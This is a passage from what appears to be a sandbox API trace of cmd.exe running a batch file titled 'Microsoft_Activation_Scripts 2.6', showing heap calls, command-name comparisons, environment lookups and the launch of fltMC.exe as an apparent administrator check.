Flags=0x8, Size=0x4012) returned 0x19a8f207980 [0177.857] GetProcessHeap () returned 0x19a8f1e0000 [0177.858] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f207980) returned 1 [0177.858] GetProcessHeap () returned 0x19a8f1e0000 [0177.858] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee310 [0177.858] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0177.858] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0177.858] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0177.858] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0177.858] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0177.858] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0177.858] GetProcessHeap () returned 0x19a8f1e0000 [0177.858] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee3d0 [0177.858] GetProcessHeap () returned 0x19a8f1e0000 [0177.858] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb8f0 [0177.858] GetProcessHeap () returned 0x19a8f1e0000 [0177.858] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xa2) returned 0x19a8f200450 [0177.859] _get_osfhandle (_FileHandle=3) returned 0x90 [0177.859] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1641 [0177.859] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efeb90, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efeb90*=0x1fff, lpOverlapped=0x0) returned 1 [0177.859] SetFilePointer (in: hFile=0x90, lDistanceToMove=5710, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x164e [0177.859] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="goto MASend\r\n", cbMultiByte=13, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="goto MASend\r\n, right click on this script and select 'Run as administrator'.\r\nnas\" && exit /b\r\n===========================================\r\n") returned 13 [0177.859] _get_osfhandle (_FileHandle=3) returned 0x90 [0177.859] GetFileType (hFile=0x90) returned 0x1 [0177.859] _get_osfhandle (_FileHandle=3) returned 0x90 [0177.859] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x164e [0177.859] GetProcessHeap () returned 0x19a8f1e0000 [0177.859] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f207980 [0177.859] GetProcessHeap () returned 0x19a8f1e0000 [0177.860] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f207980) returned 1 [0177.860] GetProcessHeap () returned 0x19a8f1e0000 [0177.860] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1fe050 [0177.860] _wcsicmp (_String1="FOR", _String2="goto") returned -1 [0177.860] _wcsicmp (_String1="FOR/?", _String2="goto") returned -1 [0177.860] _wcsicmp (_String1="IF", _String2="goto") returned 2 [0177.860] _wcsicmp (_String1="IF/?", _String2="goto") returned 2 [0177.860] _wcsicmp (_String1="REM", _String2="goto") returned 11 [0177.860] _wcsicmp (_String1="REM/?", _String2="goto") returned 11 [0177.860] GetProcessHeap () returned 0x19a8f1e0000 [0177.860] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ff910 [0177.860] GetProcessHeap () returned 0x19a8f1e0000 [0177.860] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb950 [0177.860] GetProcessHeap () returned 0x19a8f1e0000 [0177.860] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1f0300 [0177.860] _get_osfhandle (_FileHandle=3) returned 0x90 [0177.860] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x164e [0177.860] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efeb60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efeb60*=0x1fff, lpOverlapped=0x0) returned 1 [0177.860] SetFilePointer (in: hFile=0x90, lDistanceToMove=5713, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1651 [0177.860] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=")\r\n", cbMultiByte=3, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr=")\r\no MASend\r\n, right click on this script and select 'Run as administrator'.\r\nnas\" && exit /b\r\n===========================================\r\n") returned 3 [0177.861] _get_osfhandle (_FileHandle=3) returned 0x90 [0177.861] GetFileType (hFile=0x90) returned 0x1 [0177.861] _get_osfhandle (_FileHandle=3) returned 0x90 [0177.861] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1651 [0177.861] GetProcessHeap () returned 0x19a8f1e0000 [0177.861] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f207980 [0177.861] GetProcessHeap () returned 0x19a8f1e0000 [0177.861] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f207980) returned 1 [0177.861] _tell (_FileHandle=3) returned 5713 [0177.861] _close (_FileHandle=3) returned 0 [0177.862] GetProcessHeap () returned 0x19a8f1e0000 [0177.862] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1f0090 [0177.862] _get_osfhandle (_FileHandle=1) returned 0x24 [0177.862] _get_osfhandle (_FileHandle=1) returned 0x24 [0177.862] _get_osfhandle (_FileHandle=1) returned 0x24 [0177.862] GetFileType (hFile=0x24) returned 0x2 [0177.862] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0177.862] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x43f9efeb68 | out: lpMode=0x43f9efeb68) returned 1 [0177.864] _dup (_FileHandle=1) returned 3 [0177.864] _close (_FileHandle=1) returned 0 [0177.864] _wcsicmp (_String1="nul", _String2="con") returned 11 [0177.864] CreateFileW (lpFileName="nul" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x43f9efeb00, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x24 [0177.864] _open_osfhandle (_OSFileHandle=0x24, _Flags=8) returned 1 [0177.864] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efeb90, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0177.865] _wcsicmp (_String1="fltmc", _String2="DIR") returned 2 [0177.865] _wcsicmp (_String1="fltmc", _String2="ERASE") returned 1 [0177.865] _wcsicmp (_String1="fltmc", _String2="DEL") returned 2 [0177.865] _wcsicmp (_String1="fltmc", _String2="TYPE") returned -14 [0177.865] _wcsicmp (_String1="fltmc", _String2="COPY") returned 3 [0177.865] _wcsicmp (_String1="fltmc", _String2="CD") returned 3 [0177.865] _wcsicmp (_String1="fltmc", _String2="CHDIR") returned 3 [0177.865] _wcsicmp (_String1="fltmc", _String2="RENAME") returned -12 [0177.865] _wcsicmp (_String1="fltmc", _String2="REN") returned -12 [0177.865] _wcsicmp (_String1="fltmc", _String2="ECHO") returned 1 [0177.865] _wcsicmp (_String1="fltmc", _String2="SET") returned -13 [0177.865] _wcsicmp (_String1="fltmc", _String2="PAUSE") returned -10 [0177.865] _wcsicmp (_String1="fltmc", _String2="DATE") returned 2 [0177.865] _wcsicmp (_String1="fltmc", _String2="TIME") returned -14 [0177.865] _wcsicmp (_String1="fltmc", _String2="PROMPT") returned -10 [0177.865] _wcsicmp (_String1="fltmc", _String2="MD") returned -7 [0177.865] _wcsicmp (_String1="fltmc", _String2="MKDIR") returned -7 [0177.865] _wcsicmp (_String1="fltmc", _String2="RD") returned -12 [0177.865] _wcsicmp (_String1="fltmc", _String2="RMDIR") returned -12 [0177.865] _wcsicmp (_String1="fltmc", _String2="PATH") returned -10 [0177.865] _wcsicmp (_String1="fltmc", _String2="GOTO") returned -1 [0177.865] _wcsicmp (_String1="fltmc", _String2="SHIFT") returned -13 [0177.866] _wcsicmp (_String1="fltmc", _String2="CLS") returned 3 [0177.866] _wcsicmp (_String1="fltmc", _String2="CALL") returned 3 [0177.866] _wcsicmp (_String1="fltmc", _String2="VERIFY") returned -16 [0177.866] _wcsicmp (_String1="fltmc", _String2="VER") returned -16 [0177.866] _wcsicmp (_String1="fltmc", _String2="VOL") returned -16 [0177.866] _wcsicmp (_String1="fltmc", _String2="EXIT") returned 1 [0177.866] _wcsicmp (_String1="fltmc", _String2="SETLOCAL") returned -13 [0177.866] _wcsicmp (_String1="fltmc", _String2="ENDLOCAL") returned 1 [0177.866] _wcsicmp (_String1="fltmc", _String2="TITLE") returned -14 [0177.866] _wcsicmp (_String1="fltmc", _String2="START") returned -13 [0177.866] _wcsicmp (_String1="fltmc", _String2="DPATH") returned 2 [0177.866] _wcsicmp (_String1="fltmc", _String2="KEYS") returned -5 [0177.866] _wcsicmp (_String1="fltmc", _String2="MOVE") returned -7 [0177.866] _wcsicmp (_String1="fltmc", _String2="PUSHD") returned -10 [0177.866] _wcsicmp (_String1="fltmc", _String2="POPD") returned -10 [0177.866] _wcsicmp (_String1="fltmc", _String2="ASSOC") returned 5 [0177.866] _wcsicmp (_String1="fltmc", _String2="FTYPE") returned -8 [0177.866] _wcsicmp (_String1="fltmc", _String2="BREAK") returned 4 [0177.866] _wcsicmp (_String1="fltmc", _String2="COLOR") returned 3 [0177.866] _wcsicmp (_String1="fltmc", _String2="MKLINK") returned -7 [0177.866] _wcsicmp (_String1="fltmc", _String2="DIR") returned 2 [0177.866] _wcsicmp (_String1="fltmc", _String2="ERASE") returned 1 [0177.866] _wcsicmp (_String1="fltmc", _String2="DEL") returned 2 [0177.866] _wcsicmp (_String1="fltmc", _String2="TYPE") returned -14 [0177.866] _wcsicmp (_String1="fltmc", _String2="COPY") returned 3 [0177.866] _wcsicmp (_String1="fltmc", _String2="CD") returned 3 [0177.866] _wcsicmp (_String1="fltmc", _String2="CHDIR") returned 3 [0177.867] _wcsicmp (_String1="fltmc", _String2="RENAME") returned -12 [0177.867] _wcsicmp (_String1="fltmc", _String2="REN") returned -12 [0177.867] _wcsicmp (_String1="fltmc", _String2="ECHO") returned 1 [0177.867] _wcsicmp (_String1="fltmc", _String2="SET") returned -13 [0177.867] _wcsicmp (_String1="fltmc", _String2="PAUSE") returned -10 [0177.867] _wcsicmp (_String1="fltmc", _String2="DATE") returned 2 [0177.867] _wcsicmp (_String1="fltmc", _String2="TIME") returned -14 [0177.867] _wcsicmp (_String1="fltmc", _String2="PROMPT") returned -10 [0177.867] _wcsicmp (_String1="fltmc", _String2="MD") returned -7 [0177.867] _wcsicmp (_String1="fltmc", _String2="MKDIR") returned -7 [0177.867] _wcsicmp (_String1="fltmc", _String2="RD") returned -12 [0177.867] _wcsicmp (_String1="fltmc", _String2="RMDIR") returned -12 [0177.867] _wcsicmp (_String1="fltmc", _String2="PATH") returned -10 [0177.867] _wcsicmp (_String1="fltmc", _String2="GOTO") returned -1 [0177.867] _wcsicmp (_String1="fltmc", _String2="SHIFT") returned -13 [0177.867] _wcsicmp (_String1="fltmc", _String2="CLS") returned 3 [0177.867] _wcsicmp (_String1="fltmc", _String2="CALL") returned 3 [0177.867] _wcsicmp (_String1="fltmc", _String2="VERIFY") returned -16 [0177.867] _wcsicmp (_String1="fltmc", _String2="VER") returned -16 [0177.867] _wcsicmp (_String1="fltmc", _String2="VOL") returned -16 [0177.867] _wcsicmp (_String1="fltmc", _String2="EXIT") returned 1 [0177.867] _wcsicmp (_String1="fltmc", _String2="SETLOCAL") returned -13 [0177.867] _wcsicmp (_String1="fltmc", _String2="ENDLOCAL") returned 1 [0177.867] _wcsicmp (_String1="fltmc", _String2="TITLE") returned -14 [0177.867] _wcsicmp (_String1="fltmc", _String2="START") returned -13 [0177.867] _wcsicmp (_String1="fltmc", _String2="DPATH") returned 2 [0177.867] _wcsicmp (_String1="fltmc", _String2="KEYS") returned -5 [0177.867] _wcsicmp (_String1="fltmc", _String2="MOVE") returned -7 [0177.867] _wcsicmp (_String1="fltmc", _String2="PUSHD") returned -10 [0177.868] _wcsicmp (_String1="fltmc", _String2="POPD") returned -10 [0177.868] _wcsicmp (_String1="fltmc", _String2="ASSOC") returned 5 [0177.868] _wcsicmp (_String1="fltmc", _String2="FTYPE") returned -8 [0177.868] _wcsicmp (_String1="fltmc", _String2="BREAK") returned 4 [0177.868] _wcsicmp (_String1="fltmc", _String2="COLOR") returned 3 [0177.868] _wcsicmp (_String1="fltmc", _String2="MKLINK") returned -7 [0177.868] _wcsicmp (_String1="fltmc", _String2="FOR") returned -3 [0177.868] _wcsicmp (_String1="fltmc", _String2="IF") returned -3 [0177.868] _wcsicmp (_String1="fltmc", _String2="REM") returned -12 [0177.868] GetProcessHeap () returned 0x19a8f1e0000 [0177.868] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x218) returned 0x19a8f20d150 [0177.868] GetProcessHeap () returned 0x19a8f1e0000 [0177.868] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1efe50 [0177.868] _wcsnicmp (_String1="fltm", _String2="cmd ", _MaxCount=0x4) returned 3 [0177.868] GetProcessHeap () returned 0x19a8f1e0000 [0177.868] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x420) returned 0x19a8f200de0 [0177.868] SetErrorMode (uMode=0x0) returned 0x0 [0177.868] SetErrorMode (uMode=0x1) returned 0x0 [0177.868] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x19a8f200df0, lpFilePart=0x43f9efe430 | out: lpBuffer="C:\\Windows\\System32", lpFilePart=0x43f9efe430*="System32") returned 0x13 [0177.868] SetErrorMode (uMode=0x0) returned 0x1 [0177.868] GetProcessHeap () returned 0x19a8f1e0000 [0177.868] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f200de0, Size=0x44) returned 0x19a8f200de0 [0177.868] GetProcessHeap () returned 0x19a8f1e0000 [0177.868] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f200de0) returned 0x44 [0177.868] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x58 [0177.869] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0177.869] GetProcessHeap () returned 0x19a8f1e0000 [0177.869] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xee) returned 0x19a8f1fb4f0 [0177.869] GetProcessHeap () returned 0x19a8f1e0000 [0177.869] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1cc) returned 0x19a8f1eabb0 [0177.869] GetProcessHeap () returned 0x19a8f1e0000 [0177.869] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eabb0, Size=0xf0) returned 0x19a8f1eabb0 [0177.869] GetProcessHeap () returned 0x19a8f1e0000 [0177.869] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eabb0) returned 0xf0 [0177.869] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x3a [0177.869] GetProcessHeap () returned 0x19a8f1e0000 [0177.869] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xfc) returned 0x19a8f1eacb0 [0177.869] GetProcessHeap () returned 0x19a8f1e0000 [0177.869] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eacb0, Size=0x88) returned 0x19a8f1eacb0 [0177.869] GetProcessHeap () returned 0x19a8f1e0000 [0177.869] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eacb0) returned 0x88 [0177.869] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0177.869] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\fltmc.*" (normalized: "c:\\windows\\system32\\fltmc.*"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe1b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe1b0) returned 0x19a8f1f87c0 [0177.869] FindClose (in: hFindFile=0x19a8f1f87c0 | out: hFindFile=0x19a8f1f87c0) returned 1 [0177.870] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\fltMC.COM" (normalized: "c:\\windows\\system32\\fltmc.com"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe1b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe1b0) returned 0xffffffffffffffff [0177.870] GetLastError () returned 0x2 [0177.870] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\fltMC.EXE" (normalized: "c:\\windows\\system32\\fltmc.exe"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe1b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe1b0) returned 0x19a8f1f89a0 [0177.870] FindClose (in: hFindFile=0x19a8f1f89a0 | out: hFindFile=0x19a8f1f89a0) returned 1 [0177.870] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0177.870] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0177.870] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efe710, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0177.871] InitializeProcThreadAttributeList (in: lpAttributeList=0x43f9efe630, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x43f9efe530 | out: lpAttributeList=0x43f9efe630, lpSize=0x43f9efe530) returned 1 [0177.871] UpdateProcThreadAttribute (in: lpAttributeList=0x43f9efe630, dwFlags=0x0, Attribute=0x60001, lpValue=0x43f9efe51c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x43f9efe630, lpPreviousValue=0x0) returned 1 [0177.871] GetStartupInfoW (in: lpStartupInfo=0x43f9efe5c0 | out: lpStartupInfo=0x43f9efe5c0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0177.871] GetProcessHeap () returned 0x19a8f1e0000 [0177.871] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1f00f0 [0177.871] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0177.871] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0177.871] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0177.871] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0177.871] _wcsnicmp (_String1="COPYCMD", _String2="Black=\"", _MaxCount=0x7) returned 1 [0177.871] _wcsnicmp (_String1="COPYCMD", _String2="Blue=\"4", _MaxCount=0x7) returned 1 [0177.871] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0177.871] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0177.871] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0177.871] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0177.871] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0177.871] _wcsnicmp (_String1="COPYCMD", _String2="eline=e", _MaxCount=0x7) returned -2 [0177.871] _wcsnicmp (_String1="COPYCMD", _String2="esc=\x1b", _MaxCount=0x7) returned -2 [0177.871] _wcsnicmp (_String1="COPYCMD", _String2="Gray=\"1", _MaxCount=0x7) returned -4 [0177.872] _wcsnicmp (_String1="COPYCMD", _String2="Green=\"", _MaxCount=0x7) returned -4 [0177.872] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0177.872] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0177.872] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0177.872] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0177.872] _wcsnicmp (_String1="COPYCMD", _String2="Magenta", _MaxCount=0x7) returned -10 [0177.872] _wcsnicmp (_String1="COPYCMD", _String2="mas=htt", _MaxCount=0x7) returned -10 [0177.872] _wcsnicmp (_String1="COPYCMD", _String2="masver=", _MaxCount=0x7) returned -10 [0177.872] _wcsnicmp (_String1="COPYCMD", _String2="nceline", _MaxCount=0x7) returned -11 [0177.872] _wcsnicmp (_String1="COPYCMD", _String2="nul=>nu", _MaxCount=0x7) returned -11 [0177.872] _wcsnicmp (_String1="COPYCMD", _String2="nul1=1>", _MaxCount=0x7) returned -11 [0177.872] _wcsnicmp (_String1="COPYCMD", _String2="nul2=2>", _MaxCount=0x7) returned -11 [0177.872] _wcsnicmp (_String1="COPYCMD", _String2="nul6=2^", _MaxCount=0x7) returned -11 [0177.872] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0177.872] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0177.872] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0177.872] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0177.872] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0177.872] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0177.872] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0177.872] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0177.872] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0177.872] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0177.872] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0177.872] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0177.873] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0177.873] _wcsnicmp (_String1="COPYCMD", _String2="psc=pow", _MaxCount=0x7) returned -13 [0177.873] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0177.873] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0177.873] _wcsnicmp (_String1="COPYCMD", _String2="Red=\"41", _MaxCount=0x7) returned -15 [0177.873] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0177.873] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0177.873] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0177.873] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0177.873] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0177.873] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0177.873] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0177.873] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0177.873] _wcsnicmp (_String1="COPYCMD", _String2="winbuil", _MaxCount=0x7) returned -20 [0177.873] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0177.873] _wcsnicmp (_String1="COPYCMD", _String2="Yellow=", _MaxCount=0x7) returned -22 [0177.873] _wcsnicmp (_String1="COPYCMD", _String2="_batf=C", _MaxCount=0x7) returned 4 [0177.873] _wcsnicmp (_String1="COPYCMD", _String2="_batp=C", _MaxCount=0x7) returned 4 [0177.873] _wcsnicmp (_String1="COPYCMD", _String2="_Blue=\"", _MaxCount=0x7) returned 4 [0177.873] _wcsnicmp (_String1="COPYCMD", _String2="_cmdf=C", _MaxCount=0x7) returned 4 [0177.873] _wcsnicmp (_String1="COPYCMD", _String2="_Green=", _MaxCount=0x7) returned 4 [0177.873] _wcsnicmp (_String1="COPYCMD", _String2="_NCS=1", _MaxCount=0x7) returned 4 [0177.873] _wcsnicmp (_String1="COPYCMD", _String2="_PSarg=", _MaxCount=0x7) returned 4 [0177.873] _wcsnicmp (_String1="COPYCMD", _String2="_Red=\"4", _MaxCount=0x7) returned 4 [0177.873] _wcsnicmp (_String1="COPYCMD", _String2="_ttemp=", _MaxCount=0x7) returned 4 [0177.873] _wcsnicmp (_String1="COPYCMD", _String2="_White=", _MaxCount=0x7) returned 4 [0177.874] _wcsnicmp (_String1="COPYCMD", _String2="_work=C", _MaxCount=0x7) returned 4 [0177.874] _wcsnicmp (_String1="COPYCMD", _String2="_Yellow", _MaxCount=0x7) returned 4 [0177.874] GetProcessHeap () returned 0x19a8f1e0000 [0177.874] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f00f0) returned 1 [0177.874] GetProcessHeap () returned 0x19a8f1e0000 [0177.874] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x12) returned 0x19a8f1ecd80 [0177.874] lstrcmpW (lpString1="\\fltMC.exe", lpString2="\\XCOPY.EXE") returned -1 [0177.874] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\fltMC.exe", lpCommandLine="fltmc ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\System32", lpStartupInfo=0x43f9efe550*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="fltmc ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x43f9efe538 | out: lpCommandLine="fltmc ", lpProcessInformation=0x43f9efe538*(hProcess=0x9c, hThread=0x98, dwProcessId=0x10e0, dwThreadId=0x560)) returned 1 [0177.893] CloseHandle (hObject=0x98) returned 1 [0177.893] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0177.893] GetProcessHeap () returned 0x19a8f1e0000 [0177.894] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2069b0) returned 1 [0177.894] GetEnvironmentStringsW () returned 0x19a8f2029e0* [0177.894] GetProcessHeap () returned 0x19a8f1e0000 [0177.895] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xfbe) returned 0x19a8f20d9b0 [0177.895] memcpy (in: _Dst=0x19a8f20d9b0, _Src=0x19a8f2029e0, _Size=0xfbe | out: _Dst=0x19a8f20d9b0) returned 0x19a8f20d9b0 [0177.895] FreeEnvironmentStringsA (penv="=") returned 1 [0177.895] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) returned 0x0 [0177.993] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x43f9efe4b8 | out: lpExitCode=0x43f9efe4b8*=0x0) returned 1 [0177.993] CloseHandle (hObject=0x9c) returned 1 [0177.993] _vsnwprintf (in: _Buffer=0x43f9efe678, _BufferCount=0x13, _Format="%08X", _ArgList=0x43f9efe4c8 | out: 